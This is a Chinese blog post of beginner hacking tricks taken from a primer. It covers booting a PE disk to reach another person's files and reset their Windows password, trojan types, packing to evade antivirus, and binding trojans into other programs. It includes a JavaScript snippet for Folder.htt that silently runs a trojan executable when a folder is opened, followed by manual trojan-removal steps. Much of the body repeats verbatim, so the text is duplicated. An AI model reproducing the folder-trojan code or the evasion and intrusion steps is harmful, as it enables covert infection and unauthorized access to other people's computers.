安全入门级小技巧(一)
2015-11-23 00:20
190 查看
博士以来,从硕士的嵌入式转到SDN,然后又去研究其中的安全问题。 我向来认为,没有研究可以使空中楼阁,传统网络的安全研究总会是一项基本功。当然,我曾经问过做安全的大师级人物,他表示学习安全需要补的课很多,从基本共来说,反汇编,操作系统,网络协议栈等等都是基础,密码学更不多说。 我很是恶补了一番,从课本到mooc,但是安全撇除理论的东西,艰深的东西,还有很多有意思的小东西,所谓技。 理论的大牛往往看不上技这种东西,正如金庸小说中,内里高深者,一套太祖长拳也能打遍天下,否则,林镇南有着辟邪剑谱一样是渣渣。 问题是我现在处于的武力值也就笑傲江湖里的水平,所以积累一点小技巧也无可厚非。
本来一般来说,这时候就是总结一下诸如查点,踩点,google黑客之类的内容,科普一下namp,wireshark之流的用法。可惜,前阵子看这个时候木有想起来写博客,后面有精力再写。
这里先谈谈最基本的本地入侵。其实一开始想象黑客,最基本的也是这个事情,你得先能进别人的机器。抱有一定的幻想,我看了下图书馆顺来的邓吉写的黑客入门书籍,发现原来就是用ERD commander 或者PE(如深山红叶工具箱)。进去以后,c盘就是本地硬盘,不费吹灰之力,就可以获取修改本地文件。甚至修改原系统的登陆口令,也就是利用ERD 中提供的LockSmith. 同理放个木马的服务器端也是简单易行。这一段所谓的技看完之后,我发现其实任何系统,只要用个u盘做个类似PE盘的东西,都可以让他从u盘启动,从而进入,这里的关键技术是本地硬盘和启动系统的关联。 这是个关键技术,在我看来,可惜,入门么,这东西自然忽略了。后面深入以后,我会补一下的。这里mark一下。
木马种类很多,大体的思路还是将服务器端放到目标主机,然后打开特定的端口服务。这里比较有意思的是伪装技术和反弹端口技术。冰河木马和广外女生算是入门级木马,基本就是在客户端上设置配置服务器程序,然后就可以进行一系列操作,远程控制,捕获口令,修改注册表,文件操作等等。让木马服务器主动连接(反弹端口的灰鸽子)和进程隐藏的方式,是号称第三代和第四代木马技术。通过加壳技术(ASPACK ,UPX,WINU pack,FSG等)躲过杀毒软件的病毒特征库匹配也是很有意思的技术。用Deception Binder 软件合并软件是种植木马非常有用的小技巧。可惜这本入门书籍11年的版本,这几年应该还有些新的发展,后面我会继续跟进。
分享入门书籍中一段关于文件夹木马制作的过程
1)准备工作:新建文件夹,双击打开,工具栏查看->自定义文件夹 在自定义文件夹向导中选择或编辑该文件夹的HTML模板
更改文件夹模板-> 标准。完成以后,多出来Folder Setting 和desktop.ini.
2)接下来在 Folder.htt文件的之后,加上一段JavaScript代码:
木马的手动删除
1)冰河木马: 注册表\我的电脑\HKEY_CLASSES_ROOT\texfile\shell\open\command 记下默认数据
2)将其改为 “C:\Windows\notepad.exe %1”
3)进入DOS模式,删除默认数据对应的exe文件
4)重启电脑。
其他木马手动杀出都是差不多的套路,只是注册表关注不同的键值,删除不同的文件。或者比如蓝色火焰这种,用netstat -a 看是否有特定端口(eg. 19191或9191)被打开
PS: 开机进入DOS界面的:开机,在出现Windows系统界面之前,按下键盘上的“F8”键,即可进入Windows“功能菜单”界面。然后利用方向键选择“命令行模式”即可进入DOS界面
本来一般来说,这时候就是总结一下诸如查点,踩点,google黑客之类的内容,科普一下namp,wireshark之流的用法。可惜,前阵子看这个时候木有想起来写博客,后面有精力再写。
这里先谈谈最基本的本地入侵。其实一开始想象黑客,最基本的也是这个事情,你得先能进别人的机器。抱有一定的幻想,我看了下图书馆顺来的邓吉写的黑客入门书籍,发现原来就是用ERD commander 或者PE(如深山红叶工具箱)。进去以后,c盘就是本地硬盘,不费吹灰之力,就可以获取修改本地文件。甚至修改原系统的登陆口令,也就是利用ERD 中提供的LockSmith. 同理放个木马的服务器端也是简单易行。这一段所谓的技看完之后,我发现其实任何系统,只要用个u盘做个类似PE盘的东西,都可以让他从u盘启动,从而进入,这里的关键技术是本地硬盘和启动系统的关联。 这是个关键技术,在我看来,可惜,入门么,这东西自然忽略了。后面深入以后,我会补一下的。这里mark一下。
木马种类很多,大体的思路还是将服务器端放到目标主机,然后打开特定的端口服务。这里比较有意思的是伪装技术和反弹端口技术。冰河木马和广外女生算是入门级木马,基本就是在客户端上设置配置服务器程序,然后就可以进行一系列操作,远程控制,捕获口令,修改注册表,文件操作等等。让木马服务器主动连接(反弹端口的灰鸽子)和进程隐藏的方式,是号称第三代和第四代木马技术。通过加壳技术(ASPACK ,UPX,WINU pack,FSG等)躲过杀毒软件的病毒特征库匹配也是很有意思的技术。用Deception Binder 软件合并软件是种植木马非常有用的小技巧。可惜这本入门书籍11年的版本,这几年应该还有些新的发展,后面我会继续跟进。
分享入门书籍中一段关于文件夹木马制作的过程
1)准备工作:新建文件夹,双击打开,工具栏查看->自定义文件夹 在自定义文件夹向导中选择或编辑该文件夹的HTML模板
更改文件夹模板-> 标准。完成以后,多出来Folder Setting 和desktop.ini.
2)接下来在 Folder.htt文件的之后,加上一段JavaScript代码:
<Script language="javascript"> run_exe="OBJECT ID=\"RUNIT\"WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" run_exe+="CODEBASE=\"木马.exe#version=1,1,1,1\">" run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">" run_exe+="<OBJECT>" document.open(); document.clear(); document.writeln(run_exe); </script>
木马的手动删除
1)冰河木马: 注册表\我的电脑\HKEY_CLASSES_ROOT\texfile\shell\open\command 记下默认数据
2)将其改为 “C:\Windows\notepad.exe %1”
3)进入DOS模式,删除默认数据对应的exe文件
4)重启电脑。
其他木马手动杀出都是差不多的套路,只是注册表关注不同的键值,删除不同的文件。或者比如蓝色火焰这种,用netstat -a 看是否有特定端口(eg. 19191或9191)被打开
PS: 开机进入DOS界面的:开机,在出现Windows系统界面之前,按下键盘上的“F8”键,即可进入Windows“功能菜单”界面。然后利用方向键选择“命令行模式”即可进入DOS界面
相关文章推荐
- 谷歌 Project Zero 团队宣布新政策,漏洞披露前将有完整的 90 天缓冲期
- 春节长假安全手册
- 地震避险自救常识
- 路由器安全有关的目录
- 打造个性_安全的电脑系统图文教程2第1/2页
- 路由器内的安全认证
- 加强php的安全之一
- http www安全必备知识
- SQLServer 2008中的代码安全(一) 存储过程加密与安全上下文
- C语言安全编码之数值中的sizeof操作符
- PHP安全上传图片的方法
- C#实现线程安全的简易日志记录方法
- php 编写安全的代码时容易犯的错误小结
- JSP应用的安全问题
- asp.net安全、实用、简单的大容量存储过程分页第1/2页
- 新安装的MySQL数据库需要注意的安全知识
- 用PHP书写安全的脚本代码